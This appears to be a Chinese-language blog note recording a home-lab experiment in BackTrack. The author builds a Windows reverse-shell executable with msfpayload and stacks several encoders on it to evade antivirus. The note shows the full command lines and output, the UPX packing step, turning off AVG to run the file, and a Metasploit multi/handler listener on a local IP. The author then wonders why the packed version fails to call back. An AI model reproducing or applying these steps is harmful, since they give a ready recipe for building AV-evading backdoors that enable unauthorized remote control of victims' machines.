metasploit加壳upx

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)

[*] x86/alpha_upper succeeded with size 967 (iteration=1)

[*] x86/alpha_upper succeeded with size 2002 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2031 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 2060 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2089 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 2118 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 2147 (iteration=5)

[*] x86/countdown succeeded with size 2165 (iteration=1)

[*] x86/countdown succeeded with size 2183 (iteration=2)

[*] x86/countdown succeeded with size 2201 (iteration=3)

[*] x86/countdown succeeded with size 2219 (iteration=4)

[*] x86/countdown succeeded with size 2237 (iteration=5)


real    17m56.774s
user    1m22.481s
sys     6m38.633s
root@bt:~# ls
Desktop  payload3.exe

上面的命令，产生了payload3.exe。

下面是upx：

root@bt:~# apt-get install upx
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Note, selecting upx-ucl instead of upx
upx-ucl is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@bt:~# upx --help
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2009
UPX 3.04        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 27th 2009

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  --best compress best (can be slow for big files)
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give this help                    -L    display software license

Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  --no-color, --mono, --color, --no-progress   change look

Compression tuning options:
  --brute             try all available compression methods & filters [slow]
  --ultra-brute       try even more compression variants [very slow]

Backup options:
  -k, --backup        keep backup files
  --no-backup         no backup files [default]

Overlay options:
  --overlay=copy      copy any extra data attached to the file [default]
  --overlay=strip     strip any extra data attached to the file [DANGEROUS]
  --overlay=skip      don't compress a file with an overlay

Options for djgpp2/coff:
  --coff              produce COFF output [default: EXE]

Options for dos/com:
  --8086              make compressed com work on any 8086

Options for dos/exe:
  --8086              make compressed exe work on any 8086
  --no-reloc          put no relocations in to the exe header

Options for dos/sys:
  --8086              make compressed sys work on any 8086

Options for ps1/exe:
  --8-bit             uses 8 bit size compression [default: 32 bit]
  --8mib-ram          8 megabyte memory limit [default: 2 MiB]
  --boot-only         disables client/host transfer compatibility
  --no-align          don't align to 2048 bytes [enables: --console-run]

Options for watcom/le:
  --le                produce LE output [default: EXE]

Options for win32/pe, rtm32/pe & arm/pe:
  --compress-exports=0    do not compress the export section
  --compress-exports=1    compress the export section [default]
  --compress-icons=0      do not compress any icons
  --compress-icons=1      compress all but the first icon
  --compress-icons=2      compress all but the first icon directory [default]
  --compress-icons=3      compress all icons
  --compress-resources=0  do not compress any resources at all
  --keep-resource=list    do not compress resources specified by list
  --strip-relocs=0        do not strip relocations
  --strip-relocs=1        strip relocations [default]

file..   executables to (de)compress

This version supports:
    AMD64-darwin.macho               Mach/AMD64
    ARMEL-darwin.macho               Mach/ARMEL
    amd64-linux.elf                  linux/ElfAMD
    amd64-linux.kernel.vmlinux       vmlinux/AMD64
    arm-linux.elf                    linux/armel
    arm-linux.kernel.vmlinux         vmlinux/armel
    arm-wince.pe                     arm/pe
    armeb-linux.elf                  linux/armeb
    armeb-linux.kernel.vmlinux       vmlinux/armeb
    armel-linux.kernel.vmlinuz       vmlinuz/armel
    fat-darwin.macho                 Mach/fat
    i086-dos16.com                   dos/com
    i086-dos16.exe                   dos/exe
    i086-dos16.sys                   dos/sys
    i386-bsd.elf.execve              BSD/386
    i386-darwin.dylib                Dylib/i386
    i386-darwin.macho                Mach/i386
    i386-dos32.djgpp2.coff           djgpp2/coff
    i386-dos32.tmt.adam              tmt/adam
    i386-dos32.watcom.le             watcom/le
    i386-freebsd.elf                 BSD/elf386
    i386-linux.elf                   linux/elf386
    i386-linux.elf.execve            linux/386
    i386-linux.elf.shell             linux/sh386
    i386-linux.kernel.bvmlinuz       bvmlinuz/386
    i386-linux.kernel.vmlinux        vmlinux/386
    i386-linux.kernel.vmlinuz        vmlinuz/386
    i386-netbsd.elf                  BSD/elf386
    i386-openbsd.elf                 BSD/elf386
    i386-win32.pe                    win32/pe
    m68k-atari.tos                   atari/tos
    mips-linux.elf                   linux/mipseb
    mipsel-linux.elf                 linux/mipsel
    mipsel.r3000-ps1                 ps1/exe
    powerpc-darwin.dylib             Dylib/ppc32
    powerpc-darwin.macho             Mach/ppc32
    powerpc-linux.elf                linux/ElfPPC
    powerpc-linux.kernel.vmlinux     vmlinux/ppc32

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@bt:~# 

现在进行加壳：

root@bt:~# upx -5 payload3.exe -k
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2009
UPX 3.04        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 27th 2009

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     73802 ->     48128   65.21%    win32/pe     payload3.exe                  

Packed 1 file.
root@bt:~# ls -l
total 276
drwxr-xr-x 2 root root    48 2011-05-07 13:46 Desktop
-rw-r--r-- 1 root root 73802 2013-04-28 04:21 payload3_before.exe
-rw-r--r-- 1 root root 73802 2013-04-28 04:53 payload3.ex~
-rw-r--r-- 1 root root 48128 2013-04-28 04:53 payload3.exe
-rw-r--r-- 1 root root 73802 2013-04-28 04:28 read.exe
root@bt:~# 

加壳后，payload3.exe，文件变小了，备份文件是payload3.ex~

把payload3.exe上传到XP，我发现avg报告威胁。关闭掉杀毒软件后，我双击exe，发现加壳后，不能连接到BT，因为：

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337 
[*] Starting the payload handler...

一直处于这样的状态，但是不用upx做加壳，双击exe，是可以连接BT5的。不知道为什么。

为了验证加壳有没有失败，我用一个正常的putty.exe来测试，测试结果是：对putty.exe，是没有问题的。

上面可能是因为加壳失败，或者是解压缩要花很多时间，或者其他的原因。